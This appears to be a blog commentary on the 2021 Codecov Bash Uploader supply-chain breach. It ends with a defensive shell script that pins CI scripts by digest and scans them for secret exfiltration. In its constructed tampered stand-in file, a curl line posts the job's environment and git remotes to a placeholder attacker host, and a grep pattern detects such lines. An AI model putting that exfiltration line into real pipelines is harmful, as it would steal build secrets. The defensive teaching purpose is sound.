Every CI job is a small, under-supervised computer with your production secrets in its environment and root inside its container. (Comforting, isn't it?) The New Stack revisited that fact this week with an anatomy of the Codecov breach: the January 2021 incident in which an attacker added a single line to Codecov's Bash Uploader, the script CI pipelines run to publish coverage, and for the two months before anyone noticed turned the pipelines of tens of thousands of downstream users into a channel for exfiltrating their secrets.
It is a five-year-old story. The reason to reread it now is that the mechanism has not aged.
The line that turned every runner into a beacon
Codecov's uploader is (or was) a bash script that build jobs pipe into their shell to publish coverage. curl -s https://... | bash is a pattern you have written or approved this quarter, whether you admit it or not. The uploader ran with everything the CI job could see: environment variables, mounted files, whatever tokens the job needed to talk to the outside world. One line, added by someone who should not have been able to add it, is enough to make that context leave the machine. In Codecov's case the added line posted the output of env, plus the job's git remotes, to a server the attacker controlled; the credential needed to modify the script had leaked through a flaw in how Codecov built its own Docker image.
The retrospective walks through how a script pulled fresh from a vendor CDN, executed with the full permissions of the build job, leaked secrets out of customer build environments. The attacker did not need to compromise your repo. Your pipeline helpfully fetched the compromised script on every run, and nothing in it checked that the bytes arriving today were the bytes that had run yesterday.
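The two controls that mechanism calls for are easy to show concretely: pin the fetched script to a digest you have reviewed and refuse to run anything else, and scan what arrived before it runs. The script below is an added example, not Codecov's code and not from the article; the two "uploader" files are constructed stand-ins for what a job would otherwise curl from the vendor CDN, the tampered copy carries a line in the shape of the Codecov modification (an env dump POSTed out, with attacker.invalid as a placeholder host that never resolves), and the function names run_pinned, looks_like_exfil and sha256_of are mine.

```shell
#!/bin/sh
# Added example (not Codecov's code): pin a fetched CI script by digest and refuse
# to run it on mismatch, plus a crude pre-run scan for env-dump exfiltration.
# Everything is constructed locally so it runs offline; the files stand in for
# what a job would otherwise curl from a vendor CDN on every run.
set -eu

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT

# Constructed stand-in for the vendor's uploader as reviewed and pinned.
cat > "$WORKDIR/uploader.sh" <<'EOF'
#!/bin/sh
echo "uploading coverage report"
EOF

# Same script with one extra line, in the shape of the Codecov modification:
# the job's environment and git remotes POSTed to an attacker host.
# (attacker.invalid is a placeholder; the .invalid TLD never resolves.)
cat > "$WORKDIR/uploader-tampered.sh" <<'EOF'
#!/bin/sh
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload || true
echo "uploading coverage report"
EOF

# Hex SHA-256 of a file; falls back to shasum where coreutils is absent.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# run_pinned FILE EXPECTED_SHA256
# Executes FILE only if its digest equals the pinned value (which in a real
# workflow lives in the repo next to the job definition); otherwise returns 1
# without running anything.
run_pinned() {
  actual=$(sha256_of "$1")
  if [ "$actual" != "$2" ]; then
    echo "refusing to run $1: digest $actual does not match pinned $2" >&2
    return 1
  fi
  sh "$1"
}

# looks_like_exfil FILE
# Heuristic, not a proof: flags any line that both calls curl or wget and
# references the whole environment or a token-looking variable.
# Returns 0 if something matched (suspicious), 1 if nothing did.
looks_like_exfil() {
  grep -E '(curl|wget)' "$1" \
    | grep -Eq '\$\(env\)|`env`|printenv|\$\{?[A-Z_]*(TOKEN|SECRET|PASSWORD|KEY)'
}

# Here the pin is computed from the reviewed copy; in CI it is a committed
# constant, changed only when someone has read the new version of the script.
PINNED=$(sha256_of "$WORKDIR/uploader.sh")

run_pinned "$WORKDIR/uploader.sh" "$PINNED"                      # runs: digest matches
run_pinned "$WORKDIR/uploader-tampered.sh" "$PINNED" || true     # refused: one line changed
looks_like_exfil "$WORKDIR/uploader-tampered.sh" && echo "tampered copy flagged by scan"
```

Pinning does not make the script trustworthy; it moves the trust decision to the moment someone updates the pin, which is at least a moment a human can be asked to read the diff. The scan is a tripwire for the obvious shape of the attack and will miss anything obfuscated, so it complements the pin rather than replacing it. The third control, which no script can add for you, is not handing the upload step tokens it has no use for in the first place.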